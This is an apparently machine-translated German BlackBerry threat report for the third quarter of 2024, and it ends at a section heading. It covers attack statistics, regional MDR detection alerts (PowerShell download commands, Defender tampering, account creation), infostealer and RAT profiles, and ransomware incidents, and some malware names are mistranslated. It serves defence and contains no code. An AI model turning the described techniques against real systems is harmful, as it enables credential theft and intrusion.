Umsetzbare Intelligenz, die wichtig ist
Dieser Bericht bietet einen umfassenden Überblick über die globale Bedrohungslandschaft, wobei der Schwerpunkt auf der Bereitstellung von umsetzbaren Informationen liegt, die Führungskräfte nutzen können, um ihre Organisationen proaktiv zu schützen. Dieser Bericht umfasst den Zeitraum von Juli bis September 2024.
Die BlackBerry® Cybersicherheitslösungen haben fast eine Million Angriffe auf US-Kunden abgewehrt, 80.000 eindeutige bösartige Signaturen identifiziert und 430.000 gezielte Angriffe auf Wirtschaftsunternehmen verhindert.
Lesen Sie Cyberattacken rund um den Globus für weitere Informationen.
Von den 600.000 Angriffen auf kritische Infrastrukturen, die in diesem Quartal entdeckt wurden, zielten 45 % auf Finanzinstitute ab.
Entdecken Sie die internen und externen Erkenntnisse unseres Cyber Threat Intelligence (CTI)-Teams im Bereich Kritische Infrastrukturen.
PowerShell-basierte Angriffe zeigen, dass sich die Bedrohungsakteure regional anpassen und gleichzeitig die globalen Techniken in NALA, APAC und EMEA beibehalten.
Lesen Sie, wie unsere MDR-Team-Analyse die sich entwickelnden regionalen Angriffsmuster und die globale Persistenz von PowerShell-basierten Bedrohungen aufdeckt.
Der Abschnitt "Law Enforcement Limelight" zeigt die Entwicklung von Ransomware hin zu einer gezielten psychologischen Kriegsführung auf, bei der exfiltrierte Daten zunehmend als Waffe eingesetzt werden, um den Ruf zu schädigen und strategische Vorteile zu erzielen, anstatt nur finanzielle Gewinne zu erzielen.
Mehr erfahren über die Ransomware-Epidemie, die Kanada betrifft.
RansomHub beherbergt nun wichtige Partner wie LockBit und ALPHV, die für die meisten der im dritten Quartal 2024 entdeckten Ransomware-Operationen verantwortlich sind.
Mehr erfahren unter Bedrohungsakteure und Werkzeuge.
Die neue Ransomware-Gruppe Lynx wendet eine aggressive Doppelerpressungstaktik an (Kombination von Datendiebstahl und Verschlüsselung) und expandiert von Nordamerika und Australien auf die europäischen Märkte.
Lesen Sie den Abschnitt " Verbreitete Bedrohungen", um sich über aktuelle Bedrohungen für alle wichtigen Betriebssysteme zu informieren.
Wir stellen eine Liste von verbesserten Sicherheitsprotokollen und Gegenmaßnahmen zur Verfügung, um den sich entwickelnden Ransomware-Taktiken zu begegnen, wobei der Schwerpunkt auf der Reduzierung der Gefährdung und der Kommunikationssicherheit liegt.
Sehen Sie sich die Liste in den Strategien zur Risikominderung an.
Detaillierte Strategien zur Schadensbegrenzung als Reaktion auf Salt Typhoon Verstöße mit Schwerpunkt auf dem Schutz kritischer Kommunikationsinfrastrukturen.
Untersuchung von Verteidigungsstrategien zum Schutz kritischer Kommunikationsinfrastrukturen.
Inhaltsübersicht
Der BlackBerry® Global Threat Intelligence Report bietet CISOs und Entscheidungsträgern wichtige Einblicke in die neuesten Cybersecurity-Bedrohungen und -Herausforderungen, die für ihre jeweiligen Branchen und Regionen relevant sind.
Im Jahr 2024 prägten zahlreiche Faktoren die Bedrohungslandschaft im Bereich der Cybersicherheit. Wichtige Wahlen auf der ganzen Welt, anhaltende Konflikte und geopolitische Spannungen wegen verschiedener strittiger Fragen schufen ein unbeständiges Umfeld. Diese Unruhen haben böswilligen Akteuren und Cyberbedrohungsgruppen weltweit Auftrieb gegeben. Diese Akteure nutzen Unsicherheit und Unruhe aus, um finanzielle Gewinne zu erzielen, Cyberspionage zu betreiben, Schaden anzurichten oder das Chaos zu vergrößern.
Cyberangriffe rund um den Globus
Cyberattacken-Landschaft nach Branchen
Sicherheit in der Kommunikation: Bedrohungen und Abhilfemaßnahmen
Rampenlicht für die Strafverfolgung
Cyber-Bedrohungen: Schlüsselakteure, Werkzeuge und Verteidigungsmanöver
CylanceMDR: Bedrohungen und Abhilfemaßnahmen
Warnungen vom BlackBerry Incident Response Team
Allgemeine Schwachstellen und Gefährdungen
Vorherrschende Bedrohungen nach Betriebssystemen
Cyberangriffe rund um den Globus
BlackBerrys KI-gesteuerte Cybersecurity-Leistung
Während des dreimonatigen Zeitraums von Juli bis September 2024 schützten BlackBerrys KI-gesteuerte Cybersicherheitslösungen eine Vielzahl von Kunden auf der ganzen Welt. Unsere Sicherheitstechnologie vereitelte fast zwei Millionen Cyberangriffe und registrierte täglich über 3.000 einzelne bösartige Hashes, die auf unsere Kunden abzielten.
Die Vereinigten Staaten waren in diesem Quartal mit den meisten Cyberangriffen konfrontiert, weit mehr als jedes andere Land. Die Cybersecurity-Technologie von BlackBerry blockierte fast eine Million Angriffe auf US-Kunden, von denen etwa 80.000 mit einzigartigen bösartigen Hashes durchgeführt wurden.
BlackBerry verfolgt die Anzahl der einzelnen bösartigen Hashes, die bei diesen Angriffen verwendet werden, im Vergleich zur Gesamtzahl der Angriffe. Häufig wird handelsübliche Malware in größeren Angriffen wiederverwendet, was dazu führt, dass ein und dieselbe Binärdatei mehrfach identifiziert wird.
Einzigartige oder neuartige Malware wird in der Regel bei sehr gezielten Angriffen eingesetzt. In diesem Fall investieren Bedrohungsakteure viel Zeit und Mühe in die Entwicklung neuer Malware mit spezifischen Attributen, um eine bestimmte Branche, Organisation oder ein hochwertiges Ziel (HVT) durch scheinbar kleine, aber letztlich wirkungsvolle Angriffe zu kompromittieren.BlackBerry-Kunden in der Region Nordamerika und Lateinamerika (NALA) verzeichneten die höchste Anzahl versuchter Angriffe (d. h. Angriffe, die durch die Cybersecurity-Lösungen von BlackBerry gestoppt wurden) und die größte Anzahl an einzigartigen Hashes. APAC (Asien und Pazifik) lag an zweiter Stelle und EMEA (Europa, Naher Osten, Afrika) an dritter Stelle.
In diesem Berichtszeitraum zeigte die Analyse des BlackBerry Managed Detection and Response (MDR)-Teams deutliche regionale Muster in der Bedrohungsaktivität. PowerShell-basierte Angriffe erwiesen sich als konsistente globale Bedrohung, wobei die Base64-kodierte Ausführung in allen Regionen zu den fünf häufigsten Erkennungen gehörte - Platz eins in NALA, Platz fünf in APAC und Platz drei in EMEA.
Jede Region wies auch einzigartige Bedrohungsmerkmale auf:
- NALA verzeichnete eine große Anzahl von Systemtool-Missbrauch, wobei umbenannte Sysinternals-Tools und LOLBAS-Shells (Living Off the Land Binaries and Scripts) zu den größten Problemen gehörten.
- In der APAC-Region gab es zahlreiche Versuche, Anmeldedaten zu stehlen und den Schutz zu umgehen, wobei vor allem Windows Defender ins Visier genommen wurde.
- EMEA zeigte verschiedene Angriffsmuster, von PowerShell-Download-Befehlen bis hin zur Manipulation von Benutzerkonten.
Diese regionalen Unterschiede in den Cyberangriffsmustern deuten darauf hin, dass die Bedrohungsakteure ihre Vorgehensweisen auf regionale Faktoren abstimmen, während sie einige Techniken weltweit beibehalten.
Abbildung 2: Die fünf wichtigsten CylanceMDR Ausschreibungen nach Regionen.
NALA
2: Möglicherweise umbenanntes Sysinternals-Tool wurde ausgeführt
3: Dienste starteten eine LOLBAS-Shell
4: Ausführung von Fernzugriffstools
5: Ausführung des PowerShell-Download-Befehls
APAC
2.: Svchost-Zeitplanaufgabe startet Rundll32
3: Windows Defender-Manipulation über PowerShell
4: Möglicher Msiexec-Missbrauch über DLL-Laden
5: Verdächtige Base64-kodierte PowerShell-Ausführung
EMEA
2: Möglicher Missbrauch der stdout-Befehlszeile
3: Verdächtige Base64-kodierte PowerShell-Ausführung
4: Erstellung von Benutzerkonten über Net Local Group Add
5: Svchost-Zeitplanaufgabe startet Rundll32
Geopolitische Analyse und Kommentare
Es ist mehr als ein Jahrzehnt her, dass der damalige US-Verteidigungsminister Leon Panetta vor einem möglichen "Cyber-Pearl-Harbor" warnte und auf die Möglichkeit eines lähmenden Cyberangriffs auf kritische US-Infrastrukturen hinwies, der sich auf die gesamte cyber-physische Welt auswirken würde. Zwar hat sich seine düstere Warnung noch nicht bewahrheitet, aber unsere Abhängigkeit von digitalen Technologien, die anfällig für Angriffe, Ausbeutung und Manipulation sind, ist gewachsen. Einige haben das Dilemma, in dem sich unsere digitalisierten Gesellschaften befinden, als "teuflisches Geschäft" bezeichnet, bei dem die Sicherheit zugunsten von Wirtschaftswachstum, Produktivitätssteigerung und Bequemlichkeit aufs Spiel gesetzt wurde.
Vor zehn Jahren gab es nur eine Handvoll hauptsächlich staatlicher Akteure, die in der Lage waren, ausgeklügelte Cyberangriffe durchzuführen. Heute gibt es Hunderte von staatlichen und nichtstaatlichen Akteuren. Die jüngste nationale Cyber-Bedrohungsanalyse der kanadischen Regierung sowie die Cyber-Bedrohungsanalysen anderer verbündeter Länder, wie z. B. des Vereinigten Königreichs, beschreiben den Zustand der Cybersicherheit als zunehmend unvorhersehbar mit einer wachsenden Zahl aggressiver Bedrohungsakteure, die neue Technologien und Taktiken einsetzen, um ihre bösartigen Aktivitäten zu verbessern und zu verstärken.
Die Auswirkungen dieser Ausbreitung sind allgegenwärtig. Nach Angaben der Global Anti-Scam Alliance waren im Jahr 2023 schätzungsweise 25,5 % der Weltbevölkerung von Cyberbetrug betroffen. Im Vereinigten Königreich haben mehr als 70 % der mittleren und großen Unternehmen und fast 66 % der einkommensstarken Wohltätigkeitsorganisationen irgendeine Form von Cybersicherheitsverletzungen erlebt. In Kanada waren mehr als zwei Drittel (70 %) der Kanadier im vergangenen Jahr von einem Cybersicherheitsvorfall betroffen. BlackBerrys eigene Analyse bestätigt diese Trends und zeigt die Zunahme von Cyberangriffen auf kritische Infrastrukturen.
Ransomware wird weithin als die störendste Form der Cyberkriminalität angesehen, und es wächst die Befürchtung, dass "Ransomware nicht nur Unternehmen, sondern auch ganze Länder lahmlegen könnte". Tatsächlich nehmen Ransomware-Angriffe auf kritische Infrastrukturen, wie z. B. den Gesundheitssektor, deutlich zu. In den Vereinigten Staaten meldete das Department of Health and Human Services zwischen 2018 und 2022 einen 278-prozentigen Anstieg der großen Datenschutzverletzungen durch Ransomware in Krankenhäusern. Und mit der steigenden Zahl von Ransomware-Angriffen wächst auch die Vielfalt der von Ransomware-Akteuren verwendeten Taktiken und Techniken. Ransomware-Gruppen wenden inzwischen vielschichtige Erpressungsstrategien an, die die Exfiltration und Verschlüsselung von Opferdaten beinhalten und gleichzeitig Datenleckseiten im Dark Web unterhalten, auf denen gestohlene Daten von nicht kooperierenden Opfern veröffentlicht werden. Das Netz der Kriminalität wird immer komplexer.
Die Herausforderung ist nicht nur technischer Natur. Die alarmierende Realität ist, dass Cyberkriminalität negative Auswirkungen auf das menschliche Wohlergehen hat. Forscher haben einen Anstieg der Sterblichkeit im Krankenhaus um 35 % bis 41 % nach einem Ransomware-Angriff auf ein Krankenhaus dokumentiert. Andere Studien haben gezeigt, wie sich Ransomware-Angriffe kaskadenartig auf benachbarte Notaufnahmen auswirken, erhebliche Betriebsstörungen verursachen und sich negativ auf das Eintreffen von Krankenwagen, die Wartezeiten für Behandlungen und die Patientenversorgung auswirken.
Ein weiterer besorgniserregender Trend ist das Entstehen einer mit Cyberkriminalität verbundenen Menschenhandelsindustrie. Die Vereinten Nationen haben dokumentiert, dass im Jahr 2023 etwa 220.000 Menschen in Südostasien für Cyberkriminalität gehandelt werden. Diese Menschen sind in ihrem Leben bedroht und sind Folter und grausamer, unmenschlicher und erniedrigender Behandlung oder Bestrafung, willkürlicher Inhaftierung, sexueller Gewalt, Zwangsarbeit und anderen Formen der Ausbeutung ausgesetzt. Organisierte Verbrecherbanden betreiben solche Operationen seit mehr als einem Jahrzehnt von Kambodscha aus und haben sich inzwischen auf andere Länder wie Myanmar, Thailand, Laos und die Philippinen ausgedehnt. In einigen Fällen werden Menschen aus Brasilien und Ostafrika zu diesen erzwungenen Cyberkriminalitätsoperationen in Südostasien gebracht.
Da sich Cyberbedrohungen immer weiter ausbreiten, arbeiten Regierungen und die Industrie hart daran, die Ransomware Ökosystem zu stören und unsere kollektive Fähigkeit zu stärken, böswillige Cyber-Akteure abzuschrecken. Im Oktober 2024 vereinbarten BlackBerry und Public Safety Canada den gemeinsamen Vorsitz des Public-Private Sector Advisory Panel der International Counter Ransomware Initiative (CRI). Gemeinsam mit den 68 Mitgliedsstaaten der CRI arbeitet BlackBerry daran, die kollektive Widerstandsfähigkeit gegen Ransomware zu stärken und Regierungen auf der ganzen Welt besser in die Lage zu versetzen, die Bedrohung durch Ransomware und andere Cyber-Bedrohungen zu bekämpfen.
Cyberattacken-Landschaft nach Branchen
Die BlackBerry-Analysten gingen von einer globalen Perspektive zu einem branchenspezifischen Fokus über und identifizierten die primären Ziele der Bedrohungsakteure. Für die Zwecke dieses Berichts werden die Industriesektoren in zwei Hauptkategorien zusammengefasst: kritische Infrastruktur und kommerzielle Unternehmen.
BlackBerry sammelt Telemetriedaten und Statistiken über Kunden mit kritischen Infrastrukturen in den 16 von der Cybersecurity and Infrastructure Security Agency (CISA) definierten Branchen. Dazu gehören das Gesundheitswesen, Behörden, Energie, Finanzen und Verteidigung. Kommerzielle Unternehmen sind solche, die sich mit der Produktion, dem Vertrieb oder dem Verkauf von Waren und Dienstleistungen befassen. Diese Unternehmen sind in verschiedenen Sektoren wie Fertigung, Einzelhandel und Dienstleistungen tätig. Die nachstehende Abbildung 3 zeigt die Verteilung der Angriffe und eindeutigen Hashes auf kritische Infrastrukturen und Wirtschaftsunternehmen.
Abbildung 3: Verteilung der Angriffe und eindeutigen Hashes auf kritische Infrastrukturen und kommerzielle Unternehmen, April - Juni 2024 vs. Juli - September 2024.
Bedrohungen für kritische Infrastrukturen
Kritische Infrastrukturen können ein potenziell lukratives Ziel für Cyberkriminelle sein. Die wertvollen Daten, über die diese Branchen verfügen, werden oft auf Untergrundmärkten verkauft, für die Planung künftiger Angriffe verwendet oder für Spionagezwecke eingesetzt. In letzter Zeit häufen sich die Angriffe auf kritische Infrastrukturen wie Gesundheitswesen, Energie, Finanzen und Verteidigung. Für Unternehmen in diesen Sektoren sind Ausfallzeiten kostspielig. Sie sind eher bereit, Lösegeld zu zahlen, um ihre Systeme schnell wiederherzustellen, da ihnen und ihren Kunden durch die Ausfallzeiten und den fehlenden Zugang zu wichtigen Daten potenzielle Verluste entstehen könnten.
Da immer mehr Dienstleistungen digitalisiert werden und mehr Systeme als je zuvor mit dem Internet verbunden sind, geraten Organisationen in diesen Sektoren häufig ins Fadenkreuz von Cyberkriminellen. Diese kriminellen Gruppen reichen von unerfahrenen Hackern, die sich Anerkennung verschaffen wollen, bis hin zu organisierten nationalstaatlichen Bedrohungsakteuren und etablierten Ransomware-Gruppen, die ihren Feinden Chaos zufügen wollen. Die Auswirkungen dieser Angriffe können verheerend sein, da sie die nationale Sicherheit beeinträchtigen und wichtige Abläufe stören sowie die wirtschaftliche Stabilität und sogar Menschenleben gefährden.
BlackBerry Cybersicherheitslösungen, einschließlich CylanceENDPOINT™, vereitelten in diesem Quartal fast 600.000 Angriffe auf kritische Infrastrukturen, wobei 45 % dieser Angriffe auf den Finanzsektor abzielten. Der Finanzsektor ist nach wie vor ein beliebtes Ziel für Cyberangreifer.
-
Cyberbedrohungen für kritische Infrastrukturen werden von BlackBerry identifiziert und blockiert
Dies sind die Bedrohungen, die BlackBerry innerhalb seines eigenen Kundenstamms erkannt hat und vor denen es sich schützt.
-
Formularbuch
Art: Infostealer
Ziele: Lebensmittelproduktion, Justizsystem, Bildung
Regionen: APAC, NALA
FormBook und seine Weiterentwicklung, xLoader, sind fortschrittliche Malware-Familien, die sowohl als Infodiebe als auch als vielseitige Downloader fungieren. Sie haben sich immer wieder angepasst, um Cyber-Abwehrmaßnahmen zu umgehen, indem sie Techniken gegen virtuelle Maschinen (VM), Prozessinjektion und benutzerdefinierte Verschlüsselung einsetzen. xLoader wird als Malware-as-a-Service (MaaS) verkauft und kann Daten aus Browsern, E-Mail-Clients und verschiedenen Anwendungen extrahieren. Jüngste Cybervorfälle mit xLoader/FormBook hatten die Lebensmittelproduktion in der APAC-Region sowie den Bildungs- und Justizsektor in NALA zum Ziel.
-
Schlange Keylogger
Art: Infostealer
Ziele: Nahrungsmittelproduktion
Regionen: APAC
Snake Keylogger (auch bekannt als 404 Keylogger und KrakenKeylogger) ist ein MaaS, das einen abonnementbasierten Keylogger mit einer Fülle von Funktionen nutzt. Die Malware kann sensible Daten stehlen und Anmeldeinformationen von Internetbrowsern stehlen sowie Tastatureingaben protokollieren und Screenshots des Desktops des Opfers erstellen.
Snake Keylogger wurde ursprünglich Ende 2019 in einem russischen Hackerforum veröffentlicht und hat seitdem an Komplexität gewonnen. Die C2-Infrastruktur wurde weiter diversifiziert und die Malware kann ihre Nutzdaten verschlüsseln. Die Malware kann auch Antiviren-Dienste (AV) deaktivieren, sodass sie ungehindert ausgeführt werden kann. Ihre Exfiltrationsmethoden sind ungewöhnlich umfassend und umfassen E-Mail, FTP, SMTP, Pastebin (eine Textspeicher-Website) und die Messaging-App Telegram. Es ist bemerkenswert, dass Telegram im Jahr 2023 60-80 % des gesamten Internetverkehrs in Russland ausmachte und eine fast vollständig unzensierte Kommunikationsumgebung in einem Land bietet, in dem der Zugang zu Internet-Seiten streng kontrolliert wird.
-
GuLoader
Typ: Downloader
Ziele: Lebensmittelproduktion, Justizsystem
Regionen: APAC
GuLoader (auch bekannt als CloudEyE) ist ein bekannter Downloader, der zusätzliche Malware verteilt. Seit 2020 hat die Bedrohungsgruppe, die hinter GuLoader steht, Anti-Analyse-Techniken hinzugefügt, um es den Sicherheitsdiensten zu erschweren, das Vorhandensein von GuLoader auf einem System zu erkennen oder Gegenmaßnahmen zu ergreifen. GuLoader arbeitet in der Regel mit anderer Malware zusammen, insbesondere mit Infostealern wie FormBook, Agent Tesla und Remcos.
-
RedLine
Art: Infostealer
Zielgruppen: Gesundheitswesen, öffentlicher Sektor, Bildung, Lebensmittelproduktion
Regionen: NALA, APAC
RedLine ist ein Infostealer, der häufig über MaaS-Plattformen verbreitet wird. Seine Betreiber werden in erster Linie von finanziellen Motiven und nicht von politischen oder Spionageinteressen angetrieben und verfolgen eine "verstreute" Angriffsstrategie, die alle Branchen und Regionen angreift, ohne sich auf bestimmte Ziele zu konzentrieren.
-
Von externen Quellen gemeldete Cyberbedrohungen für kritische Infrastrukturen
BlackBerry-Forscher haben eine Liste der jüngsten bemerkenswerten Cyberangriffe zusammengestellt, die in diesem Quartal stattgefunden haben und über die in den Medien und von anderen Cybersicherheitsorganisationen berichtet wurde. Unser Ziel dabei ist es, einen breiteren Überblick über die Cyberbedrohungslandschaft in kritischen Infrastrukturen zu geben.
-
Im Juli hatte die Ransomware-Bedrohungsgruppe Play (PlayCrypt) zwei Energieunternehmen im Visier: Texas Electric Cooperatives, ein Verband, der 76 Stromgenossenschaften im ganzen Land vertritt, und die 21st Century Energy Group, ein Anbieter verschiedener Energiedienstleistungen und -produkte in Pennsylvania und Ohio. Die Sicherheitsverletzungen führten zum Verlust von persönlichen Informationen sowie Buchhaltungs- und Steuerdaten, von denen einige kurz darauf auf der Play Leak-Website veröffentlicht wurden.
-
Ein weiterer Angriff im Juli galt dem Richland Paris Hospital, einer gemeinnützigen Einrichtung in Louisiana, die wichtige Gesundheitsdienste für die ländliche Gemeinschaft bereitstellt. Dieser Angriff wurde von der Ransomware-Gruppe Dispossessor verübt, die erstmals im Dezember 2023 beobachtet wurde. Dispossessor agiert eher als Datenbroker denn als traditionelle Ransomware-Gruppe. In einem ungewöhnlichen Schritt veröffentlichte Dispossessor ein Video, in dem über 100 Seiten mit sensiblen Patientendaten zu sehen waren. Im August gab das FBI in Zusammenarbeit mit lokalen und internationalen Strafverfolgungsbehörden bekannt, dass sie die Infrastruktur hinter der Dispossessor-Gruppe zerschlagen haben.
-
Ende August warnten die US-Behörden in einer gemeinsamen Cybersecurity-Beratung, dass eine Gruppe von mit dem Iran verbundenen Akteuren, die als Pioneer Kitten bekannt ist, mit Ransomware-Gruppen zusammenarbeitet, um kritische Infrastrukturen in den USA und im Ausland anzugreifen, darunter Aserbaidschan, die Vereinigten Arabischen Emirate (VAE) und Israel. Zu den Zielsektoren gehörten das Gesundheits-, Bildungs-, Verteidigungs-, Finanz- und Regierungswesen. Pioneer Kitten ermöglichte es Gruppen wie RansomHouse, ALPHV und NoEscape, Ransomware einzusetzen, indem sie Schwachstellen in Firewalls und VPNs ausnutzten. Sie nutzten für ihre Angriffe auch Shodan, eine Internet-of-Things (IoT)-Suchmaschine, die "alles von Kraftwerken, Mobiltelefonen, Kühlschränken und Minecraft-Servern" findet. (Obwohl Shodan für den professionellen Einsatz gedacht ist, können seine beträchtlichen Fähigkeiten auch von Cyberkriminellen missbraucht werden).
-
Mitte September beobachteten Google-Forscher eine Cyberspionage-Gruppe mit dem Namen UNC2970, die vermutlich mit der nordkoreanischen Regierung in Verbindung steht. Mithilfe von Phishing-Taktiken gab sich diese Gruppe als verschiedene etablierte Unternehmen aus dem Energie- und Luftfahrtsektor aus und erstellte gefälschte Stellenanzeigen, um bestimmte Zielpersonen anzulocken. Sobald ein Opfer auf die Verlockung einging, erhielt es eine PDF-Datei mit einer "Stellenbeschreibung" in einem ZIP-Archiv. Um diese Datei zu öffnen, stellten die Angreifer eine bösartig modifizierte Version von SumatraPDF bereit. Bei der Ausführung wurde eine Ausführungskette in Gang gesetzt, die von BURNBOOK, einem in C/C++ geschriebenen Malware-Launcher, unterstützt wurde, der schließlich eine MISTPEN-Backdoor einrichtete. Bei MISTPEN handelt es sich um eine trojanisierte Version von binhex.dll, einem Notepad++-Plugin, das so verändert wurde, dass es eine Backdoor enthält, die den Computer des betroffenen Benutzers kompromittiert.
-
Ende September zwang ein Cyberangriff auf eine Wasseraufbereitungsanlage in Arkansas City, Kansas, den Betrieb auf manuelle Steuerung umzustellen. Der Angriff betraf zwar die Kontrollsysteme der Anlage, die Wassersicherheit blieb jedoch intakt. Die Angreifer sperrten sich versehentlich selbst aus, indem sie die Systeme offline schalteten, um eine Gefährdung sensibler Daten zu verhindern. Obwohl eine Lösegeldforderung hinterlassen wurde, wurden keine Verbindungen zu bekannten Bedrohungsgruppen festgestellt.
Bedrohungen für kommerzielle Unternehmen
Die gewerbliche Wirtschaft, die Sektoren wie Investitionsgüter, Einzelhandel und Großhandel umfasst, ist ein bevorzugtes Ziel für ausgeklügelte Cyberangriffe. Erfolgreiche Angriffe können zu kompromittierten Netzwerken, Datenverlusten, Betriebsunterbrechungen, Rufschädigung und erheblichen finanziellen Kosten führen.
In diesem Quartal haben die Cybersecurity-Lösungen von BlackBerry mehr als 430.000 gezielte Angriffe auf kommerzielle Unternehmen abgewehrt. Das folgende Diagramm zeigt die Branchen mit dem größten Volumen an Angriffsversuchen und eindeutigen Malware-Hashes.
-
Cyberbedrohungen für kommerzielle Unternehmen von BlackBerry identifiziert und abgewehrt
Dies sind die Bedrohungen, die BlackBerry innerhalb seines eigenen Kundenstamms erkannt hat und vor denen es sich schützt.
-
LummaC2
Art: Infostealer
Zielgruppen: Einzel- und Großhandel, gewerbliche und freiberufliche Dienstleistungen
Regionen: APAC, NALA
LummaC2 (auch bekannt als LummaC2 Stealer) wurde erstmals im August 2022 beobachtet und ist ein in der Programmiersprache C geschriebener Infostealer, der sowohl auf kommerzielle Unternehmen als auch auf kritische Infrastrukturen abzielt. Er konzentriert sich auf die Exfiltration sensibler Daten und wird häufig über russische Cybercrime-Foren und Telegram-Gruppen im Untergrund beworben und verbreitet. Dieser potente Infostealer wird als MaaS-Operation ausgeführt und stützt sich bei seiner Verbreitung häufig auf Trojaner und E-Mail-Spam.
-
StealerC
Art: Infostealer
Ziele: Investitionsgüter, gewerbliche und freiberufliche Dienstleistungen
Regionen: APAC, NALA
StealerC ist ein C-basierter Infostealer, der vertrauliche Daten aus verschiedenen Programmen, Webbrowsern und E-Mail-Clients stiehlt, bevor er diese privaten Informationen wieder an den Angreifer zurückschleust. Die Malware wurde erstmals im Jahr 2023 beobachtet und kann weitere Malware-Nutzlasten auf dem Gerät des Opfers ablegen.
-
Formularbuch
Art: Infostealer
Zielgruppen: Einzel- und Großhandel, gewerbliche und freiberufliche Dienstleistungen
Regionen: NALA, APAC
FormBook (erstmals 2016 beobachtet) und seine Weiterentwicklung xLoader sind hochentwickelte Malware-Familien, die als komplexe Infodiebe und vielseitige Downloader für zusätzliche Malware fungieren. Sie entwickeln sich ständig weiter, um Cyber-Abwehrmaßnahmen durch Anti-VM-Techniken, Prozessinjektion und benutzerdefinierte Verschlüsselungsroutinen zu umgehen. xLoader kann Daten aus Browsern und E-Mail-Clients stehlen und eine Vielzahl anderer Aktionen durchführen. Da er als MaaS verkauft wird, ist sein Vorhandensein in einem System oder Netzwerk nicht unbedingt auf einen bestimmten Bedrohungsakteur zurückzuführen. Dieses flexible Betriebsmodell ermöglicht es ihm, eine Vielzahl von Industriesektoren weltweit anzugreifen.
-
GuLoader
Typ: Downloader
Zielgruppen: Einzel- und Großhandel, gewerbliche und freiberufliche Dienstleistungen
Regionen: APAC, NALA
GuLoader (auch bekannt als CloudEyE) ist ein bekannter Downloader, der Malware verteilt. Die Anti-Analyse-Techniken von GuLoader, die erstmals im Jahr 2020 beobachtet wurden, erschweren es Sicherheitsteams, Angriffe zu erkennen oder Gegenmaßnahmen zu ergreifen. GuLoader arbeitet häufig im Verbund mit anderer Malware, insbesondere mit Infostealern wie FormBook, Agent Tesla und Remcos.
-
RedLine
Art: Infostealer
Ziele: Investitionsgüter, langlebige Konsumgüter und Bekleidung, gewerbliche und freiberufliche Dienstleistungen
Regionen: APAC, NALA
RedLine ist ein weit verbreiteter Malware-Infostealer, der erstmals im März 2020 beobachtet und häufig als MaaS verkauft wurde. Die Bedrohungsgruppe, die die Malware verbreitet, scheint eher durch finanziellen Gewinn als durch Politik, Datenvernichtung oder Spionage motiviert zu sein. Aus diesem Grund taucht RedLine immer wieder auf unserem Radar auf und zielt aktiv auf ein ungewöhnlich breites Spektrum von Branchen und geografischen Regionen ab.
-
Remcos
Typ: Fernzugriff
Zielgruppen: Einzel- und Großhandel, gewerbliche und freiberufliche Dienstleistungen
Regionen: APAC, NALA
Remcos, kurz für Remote Control and Surveillance, ist ein kommerzieller Fernzugriffstrojaner (RAT), der zur Fernsteuerung eines Computers oder Geräts verwendet wird. Obwohl er als legitime Software beworben wird, wird er oft missbraucht, um sich unrechtmäßig Zugang zum Computer oder Netzwerk eines Opfers zu verschaffen.
-
Von externen Quellen gemeldete Cyberbedrohungen für kommerzielle Unternehmen
BlackBerry-Forscher haben eine Liste bemerkenswerter aktueller Cyberangriffe zusammengestellt, über die in den Medien und von anderen Cybersecurity-Organisationen berichtet wurde, um einen umfassenderen Überblick über die Cyberbedrohungslandschaft für kommerzielle Unternehmen zu geben.
-
Im Juli wurde Empereon Constar, ein in Arizona ansässiges Unternehmen für die Auslagerung von Geschäftsprozessen, Opfer eines Einbruchs durch die Betreiber der Ransomware Akira, die angeblich 800 GB an Daten, darunter Kundendaten, Mitarbeiterdateien und Finanzunterlagen, gestohlen haben. Die Gruppe wendet eine doppelte Erpressungstaktik an, indem sie ein Lösegeld sowohl für die Entschlüsselung als auch für die Nichtweitergabe vertraulicher Informationen fordert. Wird das Lösegeld nicht gezahlt, drohen sie damit, die gestohlenen Daten sowohl im Surface Web als auch auf Leak-Sites im Dark Web zu veröffentlichen.
-
Ende Juli wurde das Odyssey Fitness Center in Pennsylvania von der Play-Ransomware-Gruppe (auch bekannt als PlayCrypt) angegriffen. Die Cyberkriminellen, die für mehr als 300 weltweite Ransomware-Angriffe verantwortlich sind, setzten ihre charakteristische Methode der doppelten Erpressung ein und verschlüsselten die Systeme des Fitnesscenters, nachdem sie sensible Daten exfiltriert hatten.
-
Der spanische Kunstlieferant Artesanía Chopo wurde im August von der Ransomware-Gruppe Meow Leaks angegriffen, die angeblich 85 GB an sensiblen Daten gestohlen hat. Meow Leaks ist einer von vier neuen Malware-Stämmen, die aus dem durchgesickerten Quellcode der berüchtigten Conti-Ransomware stammen. Meow Leaks behält die Kernfunktionalitäten von Conti bei, einschließlich der Verwendung des Verschlüsselungsalgorithmus ChaCha20 auf kompromittierten Rechnern. Die Opfer werden angewiesen, die Betreiber von Meow Leaks per E-Mail oder Telegram zu kontaktieren, um eine Entschlüsselung zu erhalten.
-
Im September wurde der belgische Online-Modehändler LolaLiza von den Betreibern der Ransomware BlackSuit angegriffen, die sich unbefugten Zugang zu den Datenbanken verschafften. Der Angriff zeigt die Risiken für Online-Händler ohne Ladengeschäfte auf und zwingt die Geschäftsinhaber zur Wahl zwischen der Zahlung des Lösegelds, um (hoffentlich) die Kontrolle über ihre Websites wiederzuerlangen, oder der Wiederherstellung der Dienste von Grund auf. Außerdem wird deutlich, wie wichtig es ist, regelmäßig Backups von wichtigen Daten wie Kundendatenbanken zu erstellen.
-
Ende September wurde der indische Elektronikhändler Poorvika Mobiles von der KILLSEC-Gruppe angegriffen. Durch den Einbruch wurde eine große Menge an Kundendaten offengelegt, darunter Namen, Adressen, Telefonnummern, Steuernummern, Details zur Produktlieferung, Rechnungsnummern, Transaktionsbeträge und Steuerunterlagen.
-
Der US-amerikanische Schusswaffenhändler AmChar wurde Ende September Opfer der Ransomware Cactus. Der Angriff kompromittierte Daten, darunter Datenbank-Backups, Mitarbeiterdateien, Unternehmensdaten und -verträge, Kundeninformationen und Unternehmenskorrespondenz. Sicherheitsforscher glauben, dass die Angreifer VPN-Schwachstellen ausnutzten, um in das Netzwerk von AmChar einzudringen. Anschließend stellten die Angreifer die Informationen ins Dark Web, was ein Sicherheitsrisiko für Kunden und Mitarbeiter darstellt.
Sicherheit in der Kommunikation: Bedrohungen und Abhilfemaßnahmen
